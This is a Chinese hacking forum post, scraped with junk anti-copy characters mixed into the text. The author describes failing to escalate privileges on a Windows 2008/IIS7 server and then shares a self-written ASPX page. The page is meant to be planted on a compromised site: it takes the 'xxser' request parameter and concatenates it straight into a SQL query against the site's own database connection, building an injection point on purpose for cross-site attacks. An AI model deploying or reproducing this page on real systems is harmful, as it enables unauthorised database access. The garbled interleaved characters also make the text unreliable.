昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
6 j9 |& R5 V* ^4 Z1 P其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
! c8 p2 A) U) Z- S9 X& b代码量不多,自己写个拉倒了。烦死了。5 L, k- g) Y ?; s! K+ |$ k! ^+ I. z
+ s- Q/ ?! s) n/ o
% y) L+ b0 D* n! }<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">6 U& |+ |, ]( _6 X
<html xmlns="http://www.w3.org/1999/xhtml">
+ T3 {# K, Y, U" c; ^<head runat="server">
9 v$ V; z- B3 \: L$ o <title>暗影aspx构造注射专用页面</title>3 F; Y3 g& i6 k4 j6 R0 _) O. G( M
</head>" e: U8 `4 x- ~3 Z% i9 d" r& X
<body>2 H' M3 ?' A# v: X! g
<form id="form1" runat="server">* B7 z+ g5 Q/ d0 ]3 e2 ^7 }
<div>
" D! v7 F* y, ]( B <script language="c#" runat="server">9 g) w& Y1 g8 }; r& |7 r
' y1 {$ C3 a8 X- y! s" f( e void page_init(object sender, EventArgs e)7 n$ [7 T) _3 c' Z( @+ M$ p
{: P6 _9 n( M: S! I( D9 L6 Y5 d& q* g
A; o0 K" v4 M
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();2 |; u! R, p f$ S, n# V
4 b7 X+ X P5 C! l" T+ k5 E. b5 T% F
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
8 W& R. J: B) ]$ \ u conn.Open();
/ C+ s1 j: v) l: Z# I3 E" \
9 \3 _, D) B/ N0 \ string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
( s7 f! k8 G, k' [& F, X- Y ( J6 E. m0 T1 N8 |$ @' R
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
+ Y: Y+ x" c/ Y9 Y int x = command.ExecuteNonQuery();+ j7 T1 o- J( f/ o( ]! v7 p: A
Response.Write(i+"\n");
, Z; T" Q" Q1 D) X4 t/ T Response.Write(x);7 N L/ G* k9 Y- O) J) c8 |6 ^
conn.Close();
' z$ G, k5 q. j( X" m, Z) E$ X }
# Y# X" o& K# }# K
4 b' E0 V, I9 b# X m </script>+ U+ ~0 q7 _! O* @; B( l
</div>
; i% ~$ Y/ S- Q- K </form>
: g7 g; z) [, L9 O4 R</body>3 K# {; D! D) _% h6 `
</html>) Z* V3 o9 ]: l9 b" V9 Q
|